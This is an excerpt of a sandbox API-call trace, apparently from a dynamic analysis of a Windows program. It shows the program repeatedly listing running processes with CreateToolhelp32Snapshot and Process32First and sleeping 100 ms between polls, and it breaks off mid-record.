[0226.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.166] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.355] Sleep (dwMilliseconds=0x64) [0226.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.384] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.455] Sleep (dwMilliseconds=0x64) [0226.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.477] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.550] Sleep (dwMilliseconds=0x64) [0226.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.571] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.642] Sleep (dwMilliseconds=0x64) [0226.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.665] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.734] Sleep (dwMilliseconds=0x64) [0226.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.761] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.838] Sleep (dwMilliseconds=0x64) [0226.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.853] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.924] Sleep (dwMilliseconds=0x64) [0226.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.947] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.019] Sleep (dwMilliseconds=0x64) [0227.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.042] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.152] Sleep (dwMilliseconds=0x64) [0227.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.182] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.250] Sleep (dwMilliseconds=0x64) [0227.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.273] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.332] Sleep (dwMilliseconds=0x64) [0227.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.353] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.507] Sleep (dwMilliseconds=0x64) [0227.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.523] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.596] Sleep (dwMilliseconds=0x64) [0227.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.619] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.690] Sleep (dwMilliseconds=0x64) [0227.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.713] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.786] Sleep (dwMilliseconds=0x64) [0227.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.804] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.871] Sleep (dwMilliseconds=0x64) [0227.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0227.914] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.987] Sleep (dwMilliseconds=0x64) [0227.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.010] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.084] Sleep (dwMilliseconds=0x64) [0228.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.134] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.207] Sleep (dwMilliseconds=0x64) [0228.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.229] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.300] Sleep (dwMilliseconds=0x64) [0228.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.321] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.387] Sleep (dwMilliseconds=0x64) [0228.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.417] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.501] Sleep (dwMilliseconds=0x64) [0228.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.526] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.596] Sleep (dwMilliseconds=0x64) [0228.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.616] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.690] Sleep (dwMilliseconds=0x64) [0228.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.712] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.784] Sleep (dwMilliseconds=0x64) [0228.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.817] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.943] Sleep (dwMilliseconds=0x64) [0228.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0228.972] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.070] Sleep (dwMilliseconds=0x64) [0229.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.084] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.194] Sleep (dwMilliseconds=0x64) [0229.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.211] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.284] Sleep (dwMilliseconds=0x64) [0229.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.307] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.519] Sleep (dwMilliseconds=0x64) [0229.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.580] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.707] Sleep (dwMilliseconds=0x64) [0229.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.760] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.884] Sleep (dwMilliseconds=0x64) [0229.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0229.931] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.027] Sleep (dwMilliseconds=0x64) [0230.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.086] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.213] Sleep (dwMilliseconds=0x64) [0230.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.226] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.292] Sleep (dwMilliseconds=0x64) [0230.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.322] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.396] Sleep (dwMilliseconds=0x64) [0230.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.413] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.481] Sleep (dwMilliseconds=0x64) [0230.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.524] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.646] Sleep (dwMilliseconds=0x64) [0230.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.668] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.740] Sleep (dwMilliseconds=0x64) [0230.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.759] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.832] Sleep (dwMilliseconds=0x64) [0230.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.850] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.927] Sleep (dwMilliseconds=0x64) [0230.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0230.944] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.128] Sleep (dwMilliseconds=0x64) [0231.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.150] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.284] Sleep (dwMilliseconds=0x64) [0231.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.307] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.378] Sleep (dwMilliseconds=0x64) [0231.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.412] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.476] Sleep (dwMilliseconds=0x64) [0231.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.491] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.561] Sleep (dwMilliseconds=0x64) [0231.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.623] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.683] Sleep (dwMilliseconds=0x64) [0231.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.731] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.812] Sleep (dwMilliseconds=0x64) [0231.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.835] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.915] Sleep (dwMilliseconds=0x64) [0231.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0231.932] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.991] Sleep (dwMilliseconds=0x64) [0231.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.008] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.076] Sleep (dwMilliseconds=0x64) [0232.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.129] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.274] Sleep (dwMilliseconds=0x64) [0232.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.288] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.357] Sleep (dwMilliseconds=0x64) [0232.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.385] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.479] Sleep (dwMilliseconds=0x64) [0232.519] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.532] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.632] Sleep (dwMilliseconds=0x64) [0232.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0232.722] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.949] Sleep (dwMilliseconds=0x64) [0233.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0233.018] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.153] Sleep (dwMilliseconds=0x64) [0233.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0233.181] Process32First (in: hSnapshot=0x1494, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.284] Sleep (dwMilliseconds=0x64) [0233.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0233.535] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.882] Sleep (dwMilliseconds=0x64) [0233.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0234.273] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 